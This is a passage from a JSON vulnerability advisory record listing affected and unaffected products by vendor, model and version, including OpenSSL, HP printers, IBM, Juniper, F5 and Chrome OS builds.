        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.156"
      },
      {
        "model": "laserjet cm3530 multifunction printer cc520a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "53.236.1"
      },
      {
        "model": "s2750\u0026s5700\u0026s6700 v200r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "11.16"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0"
      },
      {
        "model": "jetdirect 690n eio card j8007a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "41.16"
      },
      {
        "model": "ive os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.4"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.3"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.13"
      },
      {
        "model": "enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "5"
      },
      {
        "model": "flex system p24l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "ovf tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.17"
      },
      {
        "model": "command view server based management",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.3.3"
      },
      {
        "model": "prime network services controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "clearpass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.2.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.18"
      },
      {
        "model": "oic v100r001c00spc402",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "documentum content server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "7.0"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.1"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.30"
      },
      {
        "model": "algo one",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7.1"
      },
      {
        "model": "icewall sso dfw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "s7700\u0026s9700 v200r005+v200r005hp0",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.3.1"
      },
      {
        "model": "9.2-releng",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "color laserjet cm6030 multifunction printer ce665a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "vma san gateway g5.5.1.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.010"
      },
      {
        "model": "dsr-1000 1.09.b61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "project openssl c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "laserjet enterprise m603 series ce996a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.10"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "tivoli storage flashcopy manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "1.0.4"
      },
      {
        "model": "vtm v100r001c30",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos space 13.3r4.4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "2.4.4"
      },
      {
        "model": "oceanstor s5500t v100r005c30spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "storevirtual 2tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.1.1"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.4.1"
      },
      {
        "model": "system type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3690x571481.43"
      },
      {
        "model": "fortivoiceos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "99510"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.1"
      },
      {
        "model": "imc uam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.00"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.8"
      },
      {
        "model": "integrated management module ii",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.86"
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.6"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.12"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.24"
      },
      {
        "model": "system x3650m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79491.42"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.213"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "espace u2980 v100r001 v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "intelligent management center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "cloudburst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "laserjet enterprise m602 series ce993a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "tivoli netcool/system service monitor fp8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "watson explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.02"
      },
      {
        "model": "vsphere cli",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "junos 10.4r13",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet enterprise p3015 ce528a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.71"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "8.4-rc2-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.3"
      },
      {
        "model": "rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22.5"
      },
      {
        "model": "one-x communicator for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "x2.0.10"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "idp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.2"
      },
      {
        "model": "spa500 series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos os 13.1r4-s2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "color laserjet enterprise m750 d3l08a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "8.0"
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "system x3250m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "42521.42"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "20500"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.2"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.112"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.4.1"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.1.5.2"
      },
      {
        "model": "junos d35",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "blackberry os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.1.0.1880"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "model": "ape",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "2.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "model": "laserjet m4345 multifunction printer cb426a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "8.4-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "telepresence ip vcr series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "msr20-1x russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "telepresence sx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "si switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55000"
      },
      {
        "model": "aura application server sip core pb26",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.99"
      },
      {
        "model": "documentum content server sp1 p26",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.3"
      },
      {
        "model": "websphere message broker",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0"
      },
      {
        "model": "bladesystem c-class virtual connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.10"
      },
      {
        "model": "9.2-stable",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1.1"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.2.0"
      },
      {
        "model": "junos 12.1x44-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "tivoli netcool/system service monitor fp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "model": "sterling connect:direct for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1"
      },
      {
        "model": "junos 12.1x45-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.2"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.178"
      },
      {
        "model": "project openssl 1.0.0j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "eupp v100r001c01spc101",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.5"
      },
      {
        "model": "flex system p460 compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-42x)0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "2.2.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.5"
      },
      {
        "model": "ecns600 v100r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos 13.2r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "horizon view client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.6"
      },
      {
        "model": "proxysgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.4.6.1"
      },
      {
        "model": "service manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.21"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.8.11"
      },
      {
        "model": "oceanstor s2600t v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-471"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "color laserjet enterprise cp4025 cc490a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.164.1"
      },
      {
        "model": "communicator for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.9"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v29.7"
      },
      {
        "model": "security information and event management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.131.0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.3"
      },
      {
        "model": "laserjet printer series q3723a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.260.3"
      },
      {
        "model": "aura presence services sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.06"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "3par service processor sp-4.3.0.ga-17.p000",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "color laserjet cp6015 q3935a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.203.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "model": "sbr carrier 7.5.0-r11",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet enterprise m603 series ce994a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "junos 12.2r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "ave2000 v100r001c00sph001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.19"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.21"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.4"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce504a 2302963 436064",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "junos 10.4r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.60"
      },
      {
        "model": "digital sender 9200c q5916a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.271.3"
      },
      {
        "model": "laserjet m3035 multifunction printer cc477a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "system x3620m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73761.42"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3600v20"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "tivoli netcool/system service monitor fp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.2"
      },
      {
        "model": "laserjet p3005 printer series q7812a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.190.3"
      },
      {
        "model": "documentum content server sp2 p15",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "laserjet enterprise color flow mfp m575c cd646a 2302963 436081",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "model": "tivoli workload scheduler for applications fp01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "9.2-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "model": "laserjet p4515 cb514a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.203.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "2.0.3"
      },
      {
        "model": "10.0-rc2-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.4.13"
      },
      {
        "model": "msr4000 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.5"
      },
      {
        "model": "system x3400m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "78371.42"
      },
      {
        "model": "junos 12.2r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.1.21"
      },
      {
        "model": "laserjet p4014 cb506a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "laserjet enterprise mfp m525f cf116a 2302963 436069",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "500"
      },
      {
        "model": "puremessage for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "5.5.4"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "463012.5"
      },
      {
        "model": "financial services lending and leasing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "14.1"
      },
      {
        "model": "flex system p24l compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "nac appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vpn client v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "metro ethernet series access devices",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12000"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "email security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "eucalyptus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "eucalyptus",
        "version": "3.4.2"
      },
      {
        "model": "3par service processor sp-4.1.0.ga-97.p011",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.25"
      },
      {
        "model": "3par service processor sp-4.1.0.ga-97.p010",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "prime network",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "model": "cloudsystem foundation",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1"
      },
      {
        "model": "database and middleware automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.01"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "model": "jetdirect 635n eio card j7961g",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "41.16"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "centos",
